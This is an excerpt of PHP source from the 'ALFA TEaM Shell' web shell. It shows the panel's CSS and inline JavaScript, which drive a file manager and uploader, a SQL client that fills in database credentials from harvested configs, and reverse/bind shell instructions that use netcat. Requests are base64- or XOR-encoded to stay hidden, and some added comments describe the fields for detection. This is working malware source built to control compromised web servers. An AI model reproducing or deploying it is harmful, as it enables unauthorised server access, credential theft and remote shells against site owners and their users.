  998. <title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::..</title>
  999. <link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
  1000. <style type="text/css">
  1001. .hlabale {
  1002.     color: #67ABDF;
  1003.     border-radius: 4px;
  1004.     border: 1px solid #27979B;
  1005.     margin-left: 7px;
  1006.     padding: 2px;
  1007. }
  1008. #tbl_sympphp tr {
  1009.     text-align: center;
  1010. }
  1011. .editor-view {
  1012.     position: relative;
  1013. }
  1014. .view-content {
  1015.     position: absolute;
  1016.     overflow-y: auto;
  1017.     width: 100%;
  1018.     height: 475px;
  1019. }
  1020. *::-webkit-scrollbar-track {
  1021.     -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
  1022.     border-radius: 10px;
  1023.     background-color: #000115;
  1024. }
  1025. *::-webkit-scrollbar{
  1026.     width: 10px;
  1027.     background-color: #000115;
  1028. }
  1029. *::-webkit-scrollbar-thumb {
  1030.     border-radius: 10px;
  1031.     -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
  1032.     background-color: rgb(30, 130, 181);
  1033. }
  1034. .editor-file-name {
  1035.     margin-left: 29px;
  1036.     margin-top: 4px;
  1037.     overflow: hidden;
  1038.     text-overflow: ellipsis;
  1039.     white-space: nowrap;
  1040. }
  1041. .editor-icon {
  1042.     position: absolute;
  1043. }
  1044. .is_active {
  1045.     background: rgba(49, 55, 93, 0.77);
  1046.     border-radius: 10px;
  1047. }
  1048. .history-list {
  1049.     height: 88%;
  1050.     overflow-y: auto;
  1051. }
  1052. #editor-minimized,#cgiloader-minimized {
  1053.     display: block;
  1054.     position: fixed;
  1055.     right: -30px;
  1056.     width: 30px;
  1057.     height: 30px;
  1058.     top: 30%;
  1059. }
  1060. .minimized-wrapper {
  1061.     position: relative;
  1062.     background: rgb(14, 48, 74);
  1063.     width: 44px;
  1064.     height: 167px;
  1065.     cursor: pointer;
  1066.     border-bottom-left-radius: 5px;
  1067.     border-top-left-radius: 5px;
  1068. }
  1069. .minimized-text {
  1070.     transform: rotate(-90deg);
  1071.     color: wheat;
  1072.     font-size: x-large;
  1073.     display: inline-block;
  1074.     position: absolute;
  1075.     right: -51px;
  1076.     width: 129px;
  1077.     top: 50px;
  1078.     border-top-left-radius: 4%;
  1079.     height: 56px;
  1080.     padding: 3px
  1081. }
  1082. .close-button,.editor-minimize {
  1083.     height: 26px;
  1084.     width: 38px;
  1085.     right: 7px;
  1086.     background: rgb(29, 86, 115);
  1087.     cursor: pointer;
  1088.     position: absolute;
  1089.     box-sizing: border-box;
  1090.     line-height: 50px;
  1091.     display: inline-block;
  1092.     top: 17px;
  1093.     border-radius: 100px;
  1094. }
  1095. .editor-minimize {right: 50px;}
  1096. .close-button:before,.close-button:after,.editor-minimize:before {
  1097.     transform: rotate(-45deg);
  1098.     content: "";
  1099.     position: absolute;
  1100.     top: 63%;
  1101.     right: 6px;
  1102.     margin-top: -5px;
  1103.     margin-left: -25px;
  1104.     display: block;
  1105.     height: 4px;
  1106.     width: 27px;
  1107.     background-color: rgba(216, 207, 207, 0.75);
  1108.     transition: all 0.25s ease-out;
  1109. }
  1110. .editor-minimize:before{
  1111.     transform: rotate(0deg);
  1112. }
  1113. .close-button:after {
  1114.   transform: rotate(-135deg);
  1115. }
  1116. .close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
  1117.     background-color: red;
  1118. }
  1119. .close-button:hover,.editor-minimize:hover{
  1120.     background-color: rgba(39, 66, 80, 0.96);
  1121. }
  1122. #editor,#cgiloader {
  1123.     display: none;
  1124.     position: fixed;
  1125.     top: 0;
  1126.     width: 100%;
  1127.     height: 100%;
  1128. }
  1129. .editor-wrapper {
  1130.     width: 100%;
  1131.     height: 100%;
  1132.     position: relative;
  1133.     top: 1%;
  1134. }
  1135. .editor-header {
  1136.     width: 97%;
  1137.     background: rgba(21, 66, 88, 0.93);
  1138.     height: 37px;
  1139.     margin-left: 13px;
  1140.     position: relative;
  1141.     border-top-left-radius: 15px;
  1142.     border-top-right-radius: 15px;
  1143. }
  1144. .editor-path {
  1145.     position: absolute;
  1146.     font-size: x-large;
  1147.     margin-left: 10px;
  1148.     top: 6px;
  1149.     color: springgreen;
  1150. }
  1151. .editor-modal {
  1152.     position: relative;
  1153.     top: 0;
  1154.     background-color: rgba(0, 1, 23, 0.95);
  1155.     height: 90%;
  1156.     margin-left: 20%;
  1157.     margin-right: 2%;
  1158.     border: 2px #0e304a solid;
  1159. }
  1160. .editor-explorer {
  1161.     width: 19%;
  1162.     height: 90%;
  1163.     background-color: rgba(0, 1, 23, 0.94);
  1164.     position: absolute;
  1165.     z-index: 2;
  1166.     left: 1%;
  1167.     border: 2px rgb(14, 48, 74) solid;
  1168. }
  1169. .editor-controller {
  1170.     position: relative;
  1171.     top: -13px;
  1172. }
  1173. .file-holder {
  1174.     position: relative;
  1175.     width: 100%;
  1176.     height: 30px;
  1177. }
  1178. .file-holder > .history {
  1179.     position: absolute;
  1180.     color: rgb(3, 179, 163);
  1181.     cursor: pointer;
  1182.     left:5px;
  1183.     font-size: 18px;
  1184.     font-family: sans-serif;
  1185.     width:89%;
  1186.     height:100%;
  1187.     z-index: 3;
  1188.     border-radius: 10px;
  1189.     transition: background-color 600ms ease-out;
  1190. }
  1191. .file-holder > .history-close {
  1192.     display: block;
  1193.     opacity: 0;
  1194.     position: absolute;
  1195.     right: 2px;
  1196.     width: 20px;
  1197.     top: 4px;
  1198.     text-align: center;
  1199.     cursor: pointer;
  1200.     color: white;
  1201.     background: red;
  1202.     border-radius: 100px;
  1203.     font-family: monospace;
  1204.     z-index: 10;
  1205.     transition: opacity 600ms ease-out;
  1206.     font-size: 15px;
  1207.     height: 19px;
  1208. }
  1209. .file-holder > .history:hover {
  1210.     background-color: #646464;
  1211. }
  1212. .editor-explorer > .hheader {
  1213.     position: relative;
  1214.     color: rgb(20, 255, 7);
  1215.     border-bottom: 2px rgb(32, 106, 162) solid;
  1216.     text-align: center;
  1217.     font-family: sans-serif;
  1218.     margin-bottom: 10px;
  1219.     height: 55px;
  1220. }
  1221. .editor-search {
  1222.     position: absolute;
  1223.     bottom: 7px;
  1224.     left: 31px;
  1225. }
  1226. .hheader-text {
  1227.     position: absolute;
  1228.     left: 8px;
  1229.     top: 2px;
  1230. }
  1231. .history-clear {
  1232.     position: absolute;
  1233.     right: 8px;
  1234.     top: 2px;
  1235.     cursor: pointer;
  1236. }
  1237. .editor-body {
  1238.     position: relative;
  1239.     margin-left: 3px;
  1240. }
  1241. .editor-anim-close {
  1242.     '.showAnimation("editorClose").'
  1243. }
  1244. @keyframes editorClose {
  1245.     0% {
  1246.         transform: scale(1);
  1247.         opacity: 1;
  1248.     }
  1249.     100% {
  1250.         transform: scale(0);
  1251.         opacity: 0;
  1252.     }
  1253. }
  1254. .editor-anim-minimize {
  1255.     '.showAnimation("editorMinimize").'
  1256. }
  1257. @keyframes editorMinimize {
  1258.     0% {
  1259.         right:0px;
  1260.         opacity: 1;
  1261.     }
  1262.     100% {
  1263.         right: -2000px;
  1264.         opacity: 0;
  1265.     }
  1266. }
  1267. .editor-anim-show {
  1268.     '.showAnimation("editorShow").'
  1269. }
  1270. @keyframes editorShow {
  1271.     0% {
  1272.         right:-2000px;
  1273.         opacity: 0;
  1274.     }
  1275.     100% {
  1276.         right: 0px;
  1277.         opacity: 1;
  1278.     }
  1279. }
  1280. .minimized-show {
  1281.     '.showAnimation("minimizeShow").'
  1282. }
  1283. @keyframes minimizeShow {
  1284.     0% {
  1285.         right: -30px;
  1286.         opacity: 0;
  1287.     }
  1288.     100% {
  1289.         right: 0px;
  1290.         opacity: 1;
  1291.     }
  1292. }
  1293. .minimized-hide {
  1294.     '.showAnimation("minimizeHide").'
  1295. }
  1296. @keyframes minimizeHide {
  1297.     0% {
  1298.         right: 0px;
  1299.         opacity: 1;
  1300.     }
  1301.     100% {
  1302.         right: -30px;
  1303.         opacity: 0;
  1304.     }
  1305. }
  1306. .solevisible-text:hover {
  1307.     -webkit-text-shadow: 0px 0px 25px #00FF00;
  1308.     -moz-text-shadow: 0px 0px 25px #00FF00;
  1309.     -ms-text-shadow: 0px 0px 25px #00FF00;
  1310.     text-shadow: 0px 0px 25px #00FF00;
  1311. }
  1312. .update-holder {
  1313.     position: fixed;
  1314.     top: 0;
  1315.     background-color: rgba(0, 24, 29, 0.72);
  1316.     width: 100%;
  1317.     height: 100%;
  1318. }
  1319. .update-partner {
  1320.     width: 50%;
  1321.     position: relative;
  1322.     border-radius: 31px;
  1323.     height: 200px;
  1324.     background-color: rgba(3, 3, 41, 0.47);
  1325.     text-align: center;
  1326.     color: rgba(252, 253, 251, 0.88);
  1327.     margin-left: 25%;
  1328.     top: 23%;
  1329.     font-family: "Francois One", sans-serif;
  1330. }
  1331. .update-partner:hover {
  1332. -webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
  1333. -moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
  1334. box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
  1335. }
  1336. .update-content {
  1337.     position: relative;
  1338. }
  1339. .update-content > a {
  1340.     text-decoration: none;
  1341.     position: absolute;
  1342.     color: rgba(103, 167, 47, 0.77);
  1343.     left: 24%;
  1344.     margin-top: 7%;
  1345.     font-size: 40px;
  1346.     font-family: "Francois One", sans-serif;
  1347. }
  1348. .update-close {
  1349.     position: absolute;
  1350.     right: 0;
  1351.     margin-right: 23px;
  1352.     top: 10px;
  1353.     font-size: 27px;
  1354.     background-color: #130f50;
  1355.     width: 5%;
  1356.     border-radius: 100px;
  1357.     cursor: pointer;
  1358.     border: 2px rgb(14, 38, 90) solid;
  1359. }
  1360. .update-close:hover {
  1361.     border: 2px #25ff00 solid;
  1362.     color: #FF0000;
  1363. }
  1364. .filestools {
  1365.     height: auto;
  1366.     width: auto;
  1367.     color: #67ABDF;
  1368.     font-size: 12px;
  1369.     font-family: Verdana,Geneva,sans-serif;
  1370. }
  1371. @-moz-document url-prefix() {
  1372.     #search-input {
  1373.         width: 173px;
  1374.     }
  1375.     .editor-path {
  1376.         top:3px;
  1377.     }
  1378. }
  1379. @keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
  1380. @-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
  1381. @-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
  1382. @-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
  1383. #alfaloader{'.$csscode.'width:100px;height:100px;}
  1384. #a_loader{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
  1385. .ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile 
strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist 
li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px 
solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
  1386. .foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
  1387. .main th{text-align:left;}
  1388. .main a{color: #FFF;}
  1389. .main tr:hover{background-color:#646464;}
  1390. .ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
  1391. .bigarea{ width:99%; height:300px; }
  1392. '.alfaCssLoadColors().'
  1393. </style>';
  // Opens the panel's inline <script> (closed by a later echo of "</script>") and
  // seeds its JS globals from the current request: c_ from $GLOBALS['cwd'], and
  // a_, charset_, alfa1_..alfa10_ from the POST fields of the same names.
  // An alfaN value containing "\n" is replaced by an empty string; otherwise it is
  // escaped with ENT_QUOTES. c_, a_ and charset_ call htmlspecialchars() with no
  // flags, so single-quote escaping there follows the PHP version's default
  // (ENT_COMPAT before PHP 8.1), although the values land in single-quoted JS strings.
  // islinux reflects $GLOBALS['sys'] != "win"; post_encryption_mode reflects the
  // __ALFA_POST_ENCRYPTION__ constant (both defined outside this excerpt).
  // NOTE(review): for detection, the request fields this panel reads are a, c,
  // charset and alfa1..alfa10. The script's alfab64() helper further down sends
  // values base64-encoded, or XOR-ed with a server-emitted key and then
  // base64-encoded when post_encryption_mode is true, so the field names stay
  // readable in POST bodies while the values do not.
  1394. echo "<script type='text/javascript'>
  1395. var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  1396. var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
  1397. var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
  1398. var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
  1399. var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
  1400. var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
  1401. var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
  1402. var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
  1403. var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
  1404. var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
  1405. var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
  1406. var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
  1407. var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
  1408. var d = document;
  1409. var mysql_cache = {};
  1410. var editor_files = {};
  1411. var editor_error = true;
  1412. var editor_current_file = '';
  1413. var is_minimized = false;
  1414. var cgi_is_minimized = false;
  1415. var cgi_lang = '';
  1416. var upcount = 1;
  1417. var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
  1418. var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
  1419. function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
  1420. if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  1421. if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
  // Generates the ten alfaN lines of the JS set() body: each copies the argument
  // into the hidden form field d.mf.alfaN, or falls back to the seeded alfaN_ value.
  1422. for($j=1;$j<=10;$j++){
  1423. echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=alfa'.$j.'_;';
  1424. }
  // Emits the charset fallback and closes the JS set() function.
  1425. echo "
  1426. if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  1427. }";
  1428. echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var 
b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void 
dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var 
obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function 
